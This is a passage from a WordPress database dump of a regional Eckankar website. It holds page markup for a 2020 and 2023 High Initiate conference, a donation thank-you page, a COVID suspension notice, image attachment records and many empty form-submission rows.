src=\"https://demo2.cloudwp.dev/trial-4z924y49/wp-content/uploads/2020/02/2020-star.png\" alt=\"\" width=\"111\" height=\"198\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','HI Promo--working - DO NOT PUBLISH','','draft','closed','closed','','2020-hi-promo-working','','','2020-09-02 13:34:44','2020-09-02 19:34:44','',0,'https://eckankar-colorado.org/?page_id=259324',0,'page','',0),(259639,2,'2020-02-29 15:27:12','2020-02-29 22:27:12','<div class=\"boldgrid-section\" style=\"background-image: linear-gradient(to left, rgba(255, 255, 255, 0.77), rgba(255, 255, 255, 0.77)), url(\'https://source.unsplash.com/-g7axSVst6Y/1920x1080\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://source.unsplash.com/-g7axSVst6Y/1920x1080\" data-bg-overlaycolor=\"rgba(255,255,255,0.77)\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 86px; padding-bottom: 27px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div style=\"padding-top: 15px; text-align: center;\">\r\n<h2 class=\"bg-font-family-alt\" style=\"text-transform: capitalize; font-size: 25px;\" data-font-style=\"\">2020 Eckankar Colorado/Utah</h2>\r\n<h2 class=\"bg-font-family-alt\" style=\"color: #23507d; font-size: 34px;\" data-font-style=\"\"><strong>HIgh initiate Conference</strong></h2>\r\n<h2 class=\"bg-font-family-alt\" style=\"text-transform: capitalize; font-size: 24px;\" data-font-style=\"\">Friday May 15 – Sunday May 17</h2>\r\n<h2 class=\"bg-font-family-alt\" style=\"text-transform: capitalize; font-size: 20px;\" data-font-style=\"\">ECK Temple of Colorado</h2>\r\n<h2 class=\"bg-font-family-alt\" style=\"text-transform: capitalize; font-size: 20px; margin-top: 9px; margin-bottom: 19px;\" data-font-style=\"\">7100 W. Mississippi Avenue Lakewood, CO</h2>\r\n<p class=\"color3-color\" style=\"font-size: 18px; font-weight: 600; text-decoration: none; text-transform: none;\" data-font-weight=\"600\">The deadline to register is <span style=\"color: #950000;\">April 25th</span>. After that date, we invite you to register at the door.</p>\r\n<p class=\"\" style=\"font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">You Can Register By Mail Or Online</p>\r\n<p class=\"\" style=\"margin-top: 0px;\">&nbsp; <a class=\"btn btn-capitalize btn-rounded btn-raised btn-regular btn-color-1\" style=\"font-size: 16px; font-weight: 600;\" href=\"https://eckankarcolorado.regfox.com/2020-hi-retreat\" target=\"_blank\" rel=\"noopener noreferrer\" data-font-weight=\"600\">Register Online Now! </a></p>\r\n<p class=\"\"><a class=\"btn btn-capitalize btn-rounded btn-raised btn-regular btn-color-1\" style=\"font-size: 16px; font-weight: 600;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2020/03/H.I.-Registration-PORTRAIT-final.pdf\" target=\"_blank\" rel=\"noopener noreferrer\" data-font-weight=\"600\">Download Mail-In Registration Form</a></p>\r\n<p class=\"\" style=\"margin-top: 0px;\">&nbsp;</p>\r\n</div>\r\n<!--  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<p class=\"\"><a class=\"btn btn-warning\" href=\"https://www.eckankar-colorado.org/wp-content/uploads/2019/03/2019-HI-Info-and-Registration-low-res.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><span style=\"font-size: 14pt;\"><span style=\"font-size: 12pt;\">More Info &amp; Mail-in Registration</span></span></a></p>\r\n<p><span style=\"font-size: 12pt; color: #23507d;\"><strong>Deadline to register is XXXXXXXX. After that date, we invite you to register at the door.</strong></span></p>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n  --></div>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>','2020 H.I. Conference- PASSWORD PROTECTED PAGE','','private','closed','closed','','2020-h-i-conference-password-protected-page','','','2022-03-05 10:36:48','2022-03-05 17:36:48','',0,'https://eckankar-colorado.org/?page_id=259639',0,'page','',0),(259733,2,'2023-02-07 10:54:34','0000-00-00 00:00:00','<div style=\"padding-top: 15px; text-align: center;\">\n<h2 class=\"\" style=\"text-transform: capitalize; font-size: 25px; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Open Sans\" data-font-weight=\"600\">2023 Eckankar in Colorado</h2>\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 500; text-transform: uppercase; color: #23507d;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"500\"><strong>HIgh initiate Conference</strong></h2>\n<h2 class=\"\" style=\"text-transform: capitalize; font-size: 24px; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-style=\"\" data-font-family=\"Open Sans\" data-font-weight=\"400\">Friday April 7 – Saturday April 8</h2>\n<h2 class=\"\" style=\"text-transform: capitalize; font-size: 20px; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-style=\"\" data-font-family=\"Open Sans\" data-font-weight=\"400\">ECK Temple of Colorado - 7100 W. Mississippi Avenue Lakewood, CO</h2>\n<p class=\"bg-font-family-alt\" style=\"border-width: 0px; font-size: 20px; color: #23507d;\">Please enter <strong>whatever word you and Mel choose</strong> from the<br>\nDecember Issue of \'The Golden Leaf\' (In lowercase letters).</p>\n<p class=\"\"><a class=\"btn-color-2 btn btn-small-caps btn-pill btn-regular\" style=\"font-family: \'Open Sans\'; font-weight: 400; border-width: 0px; font-size: 18px;\" href=\"https://eckankarcolorado.regfox.com/preview/37c9dfaeef6a49bc95316244784c859b\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Register Online Now!</a></p>\n</div>','HI CONFERENCE -- GENERIC REGISTRATION WORKING-- DO NOT PUBLISH --SAVE ONLY AS DRAFT','','draft','closed','closed','','','','','2023-02-07 10:54:34','2023-02-07 17:54:34','',0,'https://eckankar-colorado.org/?page_id=259733',0,'page','',0),(260231,0,'2020-03-01 07:18:37','2020-03-01 14:18:37','','','','publish','closed','closed','','260231','','','2020-03-01 07:18:37','2020-03-01 14:18:37','',0,'https://eckankar-colorado.org/nf_sub/260231/',0,'nf_sub','',0),(260418,2,'2020-03-07 10:03:34','2020-03-07 17:03:34','','H.I. Registration--PORTRAIT-final','','inherit','closed','closed','','h-i-registration-portrait-final','','','2020-03-07 10:03:34','2020-03-07 17:03:34','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/H.I.-Registration-PORTRAIT-final.pdf',0,'attachment','application/pdf',0),(260628,0,'2020-03-12 10:05:38','2020-03-12 16:05:38','','','','publish','closed','closed','','260628','','','2020-03-12 10:05:38','2020-03-12 16:05:38','',0,'https://eckankar-colorado.org/nf_sub/260628/',0,'nf_sub','',0),(260631,0,'2020-03-13 18:15:27','2020-03-14 00:15:27','','','','publish','closed','closed','','260631','','','2020-03-13 18:15:27','2020-03-14 00:15:27','',0,'https://eckankar-colorado.org/nf_sub/260631/',0,'nf_sub','',0),(260634,0,'2020-03-14 17:05:29','2020-03-14 23:05:29','','','','publish','closed','closed','','260634','','','2020-03-14 17:05:29','2020-03-14 23:05:29','',0,'https://eckankar-colorado.org/nf_sub/260634/',0,'nf_sub','',0),(260644,2,'2020-03-14 17:36:19','2020-03-14 23:36:19','','blue-amber-flowers','','inherit','closed','closed','','blue-amber-flowers','','','2020-03-14 17:36:19','2020-03-14 23:36:19','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/blue-amber-flowers.jpg',0,'attachment','image/jpeg',0),(260645,2,'2020-03-14 17:36:20','2020-03-14 23:36:20','','blue-flower','','inherit','closed','closed','','blue-flower','','','2020-03-14 17:36:20','2020-03-14 23:36:20','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/blue-flower.jpg',0,'attachment','image/jpeg',0),(260646,2,'2020-03-14 17:36:21','2020-03-14 23:36:21','','blue-fog-branch','','inherit','closed','closed','','blue-fog-branch','','','2020-03-14 17:36:21','2020-03-14 23:36:21','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/blue-fog-branch.jpg',0,'attachment','image/jpeg',0),(260647,2,'2020-03-14 17:36:23','2020-03-14 23:36:23','','blue-rose-1','','inherit','closed','closed','','blue-rose-1','','','2020-03-14 17:36:23','2020-03-14 23:36:23','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/blue-rose-1.jpg',0,'attachment','image/jpeg',0),(260648,2,'2020-03-14 17:36:24','2020-03-14 23:36:24','','blue-water-rose','','inherit','closed','closed','','blue-water-rose','','','2020-09-28 10:56:37','2020-09-28 16:56:37','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/blue-water-rose.jpg',0,'attachment','image/jpeg',0),(260649,2,'2020-03-14 17:36:25','2020-03-14 23:36:25','','daisy','','inherit','closed','closed','','daisy','','','2020-03-14 17:36:25','2020-03-14 23:36:25','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/daisy.jpg',0,'attachment','image/jpeg',0),(260650,2,'2020-03-14 17:36:27','2020-03-14 23:36:27','','girl-kite','','inherit','closed','closed','','girl-kite','','','2020-03-14 17:36:27','2020-03-14 23:36:27','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/girl-kite.jpg',0,'attachment','image/jpeg',0),(260651,2,'2020-03-14 17:36:28','2020-03-14 23:36:28','','heart-cloud','','inherit','closed','closed','','heart-cloud','','','2020-03-14 17:36:28','2020-03-14 23:36:28','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/heart-cloud.jpg',0,'attachment','image/jpeg',0),(260652,2,'2020-03-14 17:36:30','2020-03-14 23:36:30','','hot-air-balloon-abstract','','inherit','closed','closed','','hot-air-balloon-abstract','','','2020-03-14 17:36:30','2020-03-14 23:36:30','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/hot-air-balloon-abstract.jpg',0,'attachment','image/jpeg',0),(260653,2,'2020-03-14 17:36:31','2020-03-14 23:36:31','','long-road','','inherit','closed','closed','','long-road','','','2020-03-14 17:36:31','2020-03-14 23:36:31','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/long-road.jpg',0,'attachment','image/jpeg',0),(260654,2,'2020-03-14 17:36:32','2020-03-14 23:36:32','','mtn-path-1','','inherit','closed','closed','','mtn-path-1','','','2020-03-14 17:36:32','2020-03-14 23:36:32','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/mtn-path-1.jpg',0,'attachment','image/jpeg',0),(260655,2,'2020-03-14 17:36:34','2020-03-14 23:36:34','','pink-tree','','inherit','closed','closed','','pink-tree','','','2020-03-14 17:36:34','2020-03-14 23:36:34','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/pink-tree.jpg',0,'attachment','image/jpeg',0),(260656,2,'2020-03-14 17:36:35','2020-03-14 23:36:35','','red-poppy-field','','inherit','closed','closed','','red-poppy-field','','','2020-03-14 17:36:35','2020-03-14 23:36:35','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/red-poppy-field.jpg',0,'attachment','image/jpeg',0),(260657,2,'2020-03-14 17:36:37','2020-03-14 23:36:37','','seashells-abstract','','inherit','closed','closed','','seashells-abstract','','','2020-03-14 17:36:37','2020-03-14 23:36:37','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/seashells-abstract.jpg',0,'attachment','image/jpeg',0),(260658,2,'2020-03-14 17:36:39','2020-03-14 23:36:39','','stones-sunset','','inherit','closed','closed','','stones-sunset','','','2020-03-14 17:36:39','2020-03-14 23:36:39','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/stones-sunset.jpg',0,'attachment','image/jpeg',0),(260659,2,'2020-03-14 17:36:40','2020-03-14 23:36:40','','sunflower-field','','inherit','closed','closed','','sunflower-field','','','2020-03-14 17:36:40','2020-03-14 23:36:40','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/sunflower-field.jpg',0,'attachment','image/jpeg',0),(260660,2,'2020-03-14 17:36:42','2020-03-14 23:36:42','','surreal-child-bike','','inherit','closed','closed','','surreal-child-bike','','','2020-03-14 17:36:42','2020-03-14 23:36:42','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/surreal-child-bike.jpg',0,'attachment','image/jpeg',0),(260661,2,'2020-03-14 17:36:44','2020-03-14 23:36:44','','tree-blue-field','','inherit','closed','closed','','tree-blue-field','','','2020-03-14 17:36:44','2020-03-14 23:36:44','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/tree-blue-field.jpg',0,'attachment','image/jpeg',0),(260662,2,'2020-03-14 17:36:45','2020-03-14 23:36:45','','wood-bridge-nature','','inherit','closed','closed','','wood-bridge-nature','','','2020-03-14 17:36:45','2020-03-14 23:36:45','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/wood-bridge-nature.jpg',0,'attachment','image/jpeg',0),(261495,2,'2020-03-16 18:21:14','2020-03-17 00:21:14','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 0px;\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\n</div>\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px; background-image: linear-gradient(to left, rgba(17, 90, 116, 0.63), rgba(17, 90, 116, 0.63)), url(\'https://demo2.cloudwp.dev/trial-4z924y49/wp-content/uploads/2020/02/waterbk-1.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://demo2.cloudwp.dev/trial-4z924y49/wp-content/uploads/2020/02/waterbk-1.jpg\" data-bg-overlaycolor=\"rgba(17,90,116,0.63)\">\n<div class=\"col-md-6 col-sm-6 col-xs-12 col-lg-6\" style=\"background-color: rgba(255, 255, 255, 0.76);\">\n<h2 class=\"color3-color\" style=\"font-family: Open Sans; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">2020 Colorado/Utah<br>\nH.I. Conference</h2>\n<p class=\"\" style=\"font-family: Lusitana; font-weight: 600; font-size: 30px; color: #115a74;\" data-font-family=\"Lusitana\" data-font-weight=\"600\" data-font-style=\"\">Creating A Spiritual Legacy</p>\n<p class=\"\" style=\"font-family: Lusitana; font-weight: 600; font-size: 30px; color: #115a74; margin-top: -16px;\" data-font-style=\"\" data-font-family=\"Lusitana\" data-font-weight=\"600\">Through Service and Love</p>\n<p class=\"\" data-font-style=\"\" data-font-family=\"Lusitana\" data-font-weight=\"600\"><span style=\"font-size: 14pt;\"><strong><span style=\"font-size: 14pt;\">Guest Speakers:</span> Linda and Paul Morelli</strong></span><br>\n<span style=\"font-size: 12pt;\">Linda and Paul Morelli are members of the ECKANKAR clergy, </span><span style=\"font-size: 12pt;\">and serve together as Co-RESA’s of New York.</span></p>\n<p class=\"\" style=\"font-size: 16px;\">\"All who have a deep desire to reach the heights of love and service to God need to look no farther than their own hearts. It’s all about consciousness. It’s all about love for God, the holy ECK, and the Mahanta.\"</p>\n<p class=\"\" style=\"font-size: 13px;\">&nbsp;—Sri Harold Klemp, <em>Wisdom from the Master on Spiritual Leadership</em>, Book 2, p. 408</p>\n</div>\n<div class=\"col-md-4 col-sm-6 col-xs-12 col-lg-4\">\n<p class=\"color1-color\" style=\"font-size: 30px; font-weight: 600; padding: 0em 0px 0px; margin-top: 8px; margin-bottom: -6px; line-height: 37px;\" data-font-weight=\"600\">A Conference For<br>\nEckankar<br>\nHigh Initiates</p>\n<p class=\"color1-color\" style=\"font-size: 30px; font-weight: 600; padding: 0px; margin-top: 20px;\" data-font-weight=\"600\">May 15-17, 2020</p>\n<p class=\"\" data-font-weight=\"600\">&nbsp;</p>\n<p class=\"color1-color\" style=\"font-size: 18px; font-weight: 600; margin-top: -15px;\" data-font-weight=\"600\">ECK Temple of Colorado<br>\n7100 West Mississippi, Lakewood, CO</p>\n<p class=\"color1-color\">Event Program and Other Info Will<br>\nBe Posted When Available</p>\n<p class=\"\"><a class=\"btn btn-rounded btn-color-1 btn-raised\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/2020-h-i-conference-password-protected-page/\" data-font-weight=\"600\">REGISTER NOW!</a></p>\n</div>\n<div class=\"col-md-2 col-sm-12 col-xs-12 col-lg-2\">\n<p class=\"\"><img class=\"aligncenter wp-image-233278 size-full\" src=\"https://demo2.cloudwp.dev/trial-4z924y49/wp-content/uploads/2020/02/2020-star.png\" alt=\"\" width=\"111\" height=\"198\"></p>\n</div>\n</div>\n</div>\n</div>','2020 HI Conference-FINAL BLOCK','','draft','closed','closed','','2020-hi-conference-final-block','','','2022-11-17 22:54:46','2022-11-18 05:54:46','',0,'https://eckankar-colorado.org/bg-block/2020-hi-conference-final-block/',0,'bg_block','',0),(261497,2,'2020-03-18 14:05:23','2020-03-18 20:05:23','','eck-logo-paypal','','inherit','closed','closed','','eck-logo-paypal','','','2020-03-18 14:05:23','2020-03-18 20:05:23','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/03/eck-logo-paypal.png',0,'attachment','image/png',0),(261498,0,'2020-03-18 19:16:38','2020-03-19 01:16:38','','','','publish','closed','closed','','261498','','','2020-03-18 19:16:38','2020-03-19 01:16:38','',0,'https://eckankar-colorado.org/nf_sub/261498/',0,'nf_sub','',0),(261517,2,'2021-10-27 20:35:57','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>&nbsp;</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 50px; padding-bottom: 50px;\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\" style=\"text-align: center; font-size: 23px; font-weight: 600; color: #534f4f;\" data-font-weight=\"600\">Considering the COVID-19 virus and for everyone\'s health and safety, all ECKANKAR events are suspended until further notice.</p>\n<p class=\"\" style=\"text-align: center; font-size: 23px; font-weight: 400; color: #534f4f;\" data-font-weight=\"400\">We invite you to sing HU for strength, wisdom, and inner guidance</p>\n<p data-font-weight=\"400\">&nbsp;</p>\n<p class=\"\">&nbsp;</p>\n</div>\n</div>\n</div>\n</div>','COVID WARNING DRAFT -- DO NOT PUBLISH','','draft','closed','closed','','','','','2021-10-27 20:35:57','2021-10-28 02:35:57','',0,'https://eckankar-colorado.org/?page_id=261517',0,'page','',0),(261524,0,'2020-03-29 21:07:45','2020-03-30 03:07:45','','','','publish','closed','closed','','261524','','','2020-03-29 21:07:45','2020-03-30 03:07:45','',0,'https://eckankar-colorado.org/nf_sub/261524/',0,'nf_sub','',0),(261525,0,'2020-03-31 20:57:02','2020-04-01 02:57:02','','','','publish','closed','closed','','261525','','','2020-03-31 20:57:02','2020-04-01 02:57:02','',0,'https://eckankar-colorado.org/nf_sub/261525/',0,'nf_sub','',0),(261526,0,'2020-04-02 13:34:17','2020-04-02 19:34:17','','','','publish','closed','closed','','261526','','','2020-04-02 13:34:17','2020-04-02 19:34:17','',0,'https://eckankar-colorado.org/nf_sub/261526/',0,'nf_sub','',0),(261530,0,'2020-04-05 07:19:50','2020-04-05 13:19:50','','','','publish','closed','closed','','261530','','','2020-04-05 07:19:50','2020-04-05 13:19:50','',0,'https://eckankar-colorado.org/nf_sub/261530/',0,'nf_sub','',0),(261531,0,'2020-04-05 22:01:20','2020-04-06 04:01:20','','','','publish','closed','closed','','261531','','','2020-04-05 22:01:20','2020-04-06 04:01:20','',0,'https://eckankar-colorado.org/nf_sub/261531/',0,'nf_sub','',0),(261533,2,'2020-04-08 18:51:37','2020-04-09 00:51:37','<div class=\"tmpl-call_to_action-12 boldgrid-section dynamic-gridblock background-scroll\" style=\"color: #ffffff; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2020/04/coeck-thanks-1.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2020/04/coeck-thanks-1.jpg\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 95px; padding-bottom: 108px;\">\r\n<div class=\"col-md-2 col-sm-1 col-xs-12\"></div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 text-center\">\r\n<h1 class=\"\" style=\"text-transform: capitalize; font-size: 84px; color: #af5908; margin-top: 20px; padding: 0em;\">Thank you!</h1>\r\n<h1 class=\"\" style=\"text-transform: capitalize; font-size: 42px; color: #4c4747;\">for your donation to Eckankar In Colorado</h1>\r\n<div class=\"row bg-editor-hr-wrap\" style=\"margin-top: -8px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<hr class=\"color2-color bg-hr-2 bg-hr\" style=\"margin-bottom: 30px; margin-right: auto; margin-left: auto;\" width=\"50%\"></div>\r\n</div>\r\n</div>\r\n<p class=\"\" style=\"font-size: 21px; color: #2d2d2d; margin: -20px;\">We are extremely grateful to have your support, it truly makes a difference. Your gift will help us continue to create a bright spiritual future for Eckankar In Colorado.</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-md-2 col-sm-1 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>','Thank You - For Donation','','publish','closed','closed','','thank-you-for-donation','','','2020-04-08 18:51:37','2020-04-09 00:51:37','',0,'https://eckankar-colorado.org/?page_id=261533',0,'page','',0),(261536,2,'2020-04-08 09:28:23','2020-04-08 15:28:23','','coeck-thanks-1','','inherit','closed','closed','','coeck-thanks-1','','','2020-04-08 09:28:23','2020-04-08 15:28:23','',261533,'https://eckankar-colorado.org/wp-content/uploads/2020/04/coeck-thanks-1.jpg',0,'attachment','image/jpeg',0),(261549,2,'2020-04-12 17:35:45','2020-04-12 23:35:45','<div class=\"tmpl-call_to_action-19 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #1d1d1d; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.8), rgba(255, 255, 255, 0.8)), url(\'https://source.unsplash.com/TiKZ7tzM4P8/1920x1080\'); background-size: cover; background-position: 50% 50%;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\" data-image-url=\"https://source.unsplash.com/TiKZ7tzM4P8/1920x1080\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 169px; padding-bottom: 202px;\">\r\n<div class=\"col-md-2 col-sm-2 col-xs-12 col-lg-2\"></div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 text-center col-lg-8\">\r\n<h1 class=\"\" style=\"text-transform: capitalize; margin-bottom: 30px; color: #23507d;\">RESA Structure - Organization Chart</h1>\r\n<p class=\"\"><a class=\"btn btn-rounded btn-small-caps btn-raised btn-color-1\" style=\"font-size: 17px;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2023/08/RESA-Org-Chart-5.13.23rev-blue.pdf\">View / Download</a></p>\r\n</div>\r\n<div class=\"col-md-2 col-sm-2 col-xs-12 col-lg-2\"></div>\r\n</div>\r\n</div>\r\n</div>','RESA Structure - Organization Chart PDF','','publish','closed','closed','','resa-structure-org-chart-pdf','','','2023-09-03 21:09:56','2023-09-04 03:09:56','',79666,'https://eckankar-colorado.org/?page_id=261549',0,'page','',0),(261555,0,'2020-04-12 11:53:09','2020-04-12 17:53:09','','','','publish','closed','closed','','261555','','','2020-04-12 11:53:09','2020-04-12 17:53:09','',0,'https://eckankar-colorado.org/nf_sub/261555/',0,'nf_sub','',0),(261564,2,'2020-04-12 20:09:18','2020-04-13 02:09:18','','RESA Org Chart','','publish','closed','closed','','261564','','','2020-04-12 20:27:08','2020-04-13 02:27:08','',0,'https://eckankar-colorado.org/?post_type=pdfposter&#038;p=261564',0,'pdfposter','',0),(261610,0,'2020-04-30 09:53:52','2020-04-30 15:53:52','','','','publish','closed','closed','','261610','','','2020-04-30 09:53:52','2020-04-30 15:53:52','',0,'https://eckankar-colorado.org/nf_sub/261610/',0,'nf_sub','',0),(261611,2,'2020-05-02 10:16:33','2020-05-02 16:16:33','','miracles_video-lg','','inherit','closed','closed','','miracles_video-lg','','','2020-05-02 10:16:33','2020-05-02 16:16:33','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/05/miracles_video-lg.jpg',0,'attachment','image/jpeg',0),(261616,0,'2020-05-06 13:33:06','2020-05-06 19:33:06','','','','publish','closed','closed','','261616','','','2020-05-06 13:33:06','2020-05-06 19:33:06','',0,'https://eckankar-colorado.org/nf_sub/261616/',0,'nf_sub','',0),(261617,0,'2020-05-08 16:13:59','2020-05-08 22:13:59','','','','publish','closed','closed','','261617','','','2020-05-08 16:13:59','2020-05-08 22:13:59','',0,'https://eckankar-colorado.org/nf_sub/261617/',0,'nf_sub','',0),(261620,0,'2020-05-17 18:43:51','2020-05-18 00:43:51','','','','publish','closed','closed','','261620','','','2020-05-17 18:43:51','2020-05-18 00:43:51','',0,'https://eckankar-colorado.org/nf_sub/261620/',0,'nf_sub','',0),(261630,0,'2020-05-25 09:01:37','2020-05-25 15:01:37','','','','publish','closed','closed','','261630','','','2020-05-25 09:01:37','2020-05-25 15:01:37','',0,'https://eckankar-colorado.org/nf_sub/261630/',0,'nf_sub','',0),(261632,0,'2020-05-27 07:14:05','2020-05-27 13:14:05','','','','publish','closed','closed','','261632','','','2020-05-27 07:14:05','2020-05-27 13:14:05','',0,'https://eckankar-colorado.org/nf_sub/261632/',0,'nf_sub','',0),(261633,0,'2020-05-28 07:29:59','2020-05-28 13:29:59','','','','publish','closed','closed','','261633','','','2020-05-28 07:29:59','2020-05-28 13:29:59','',0,'https://eckankar-colorado.org/nf_sub/261633/',0,'nf_sub','',0),(261635,0,'2020-06-01 18:30:09','2020-06-02 00:30:09','','','','publish','closed','closed','','261635','','','2020-06-01 18:30:09','2020-06-02 00:30:09','',0,'https://eckankar-colorado.org/nf_sub/261635/',0,'nf_sub','',0),(261644,0,'2020-06-07 19:19:56','2020-06-08 01:19:56','','','','publish','closed','closed','','261644','','','2020-06-07 19:19:56','2020-06-08 01:19:56','',0,'https://eckankar-colorado.org/nf_sub/261644/',0,'nf_sub','',0),(261707,0,'2020-06-24 16:16:11','2020-06-24 22:16:11','','','','publish','closed','closed','','261707','','','2020-06-24 16:16:11','2020-06-24 22:16:11','',0,'https://eckankar-colorado.org/nf_sub/261707/',0,'nf_sub','',0),(261711,0,'2020-06-30 09:03:54','2020-06-30 15:03:54','','','','publish','closed','closed','','261711','','','2020-06-30 09:03:54','2020-06-30 15:03:54','',0,'https://eckankar-colorado.org/nf_sub/261711/',0,'nf_sub','',0),(261712,0,'2020-06-30 14:24:10','2020-06-30 20:24:10','','','','publish','closed','closed','','261712','','','2020-06-30 14:24:10','2020-06-30 20:24:10','',0,'https://eckankar-colorado.org/nf_sub/261712/',0,'nf_sub','',0),(261713,2,'2020-06-30 14:34:12','2020-06-30 20:34:12','','Floating Bar - Soft Blue','','publish','closed','closed','','floating-bar','','','2020-06-30 14:34:12','2020-06-30 20:34:12','',0,'https://eckankar-colorado.org/?post_type=popup_theme&p=261713',0,'popup_theme','',0),(261714,2,'2020-06-30 14:34:17','2020-06-30 20:34:17','','Floating Bar - Soft Blue','','publish','closed','closed','','floating-bar-2','','','2020-06-30 14:34:17','2020-06-30 20:34:17','',0,'https://eckankar-colorado.org/?post_type=popup_theme&p=261714',0,'popup_theme','',0),(261715,0,'2020-07-03 12:48:44','2020-07-03 18:48:44','','','','publish','closed','closed','','261715','','','2020-07-03 12:48:44','2020-07-03 18:48:44','',0,'https://eckankar-colorado.org/nf_sub/261715/',0,'nf_sub','',0),(261720,0,'2020-07-05 13:06:48','2020-07-05 19:06:48','','','','publish','closed','closed','','261720','','','2020-07-05 13:06:48','2020-07-05 19:06:48','',0,'https://eckankar-colorado.org/nf_sub/261720/',0,'nf_sub','',0),(261730,0,'2020-07-13 20:19:26','2020-07-14 02:19:26','','','','publish','closed','closed','','261730','','','2020-07-13 20:19:26','2020-07-14 02:19:26','',0,'https://eckankar-colorado.org/nf_sub/261730/',0,'nf_sub','',0),(261738,0,'2020-07-25 08:55:44','2020-07-25 14:55:44','','','','publish','closed','closed','','261738','','','2020-07-25 08:55:44','2020-07-25 14:55:44','',0,'https://eckankar-colorado.org/nf_sub/261738/',0,'nf_sub','',0),(261743,0,'2020-08-03 20:50:37','2020-08-04 02:50:37','','','','publish','closed','closed','','261743','','','2020-08-03 20:50:37','2020-08-04 02:50:37','',0,'https://eckankar-colorado.org/nf_sub/261743/',0,'nf_sub','',0),(261744,0,'2020-08-03 20:58:06','2020-08-04 02:58:06','','','','publish','closed','closed','','261744','','','2020-08-03 20:58:06','2020-08-04 02:58:06','',0,'https://eckankar-colorado.org/nf_sub/261744/',0,'nf_sub','',0),(261776,0,'2020-08-21 09:48:34','2020-08-21 15:48:34','','','','publish','closed','closed','','261776','','','2020-08-21 09:48:34','2020-08-21 15:48:34','',0,'https://eckankar-colorado.org/nf_sub/261776/',0,'nf_sub','',0),(261784,0,'2020-08-25 18:15:45','2020-08-26 00:15:45','','','','publish','closed','closed','','261784','','','2020-08-25 18:15:45','2020-08-26 00:15:45','',0,'https://eckankar-colorado.org/nf_sub/261784/',0,'nf_sub','',0),(261786,0,'2020-08-28 11:48:46','2020-08-28 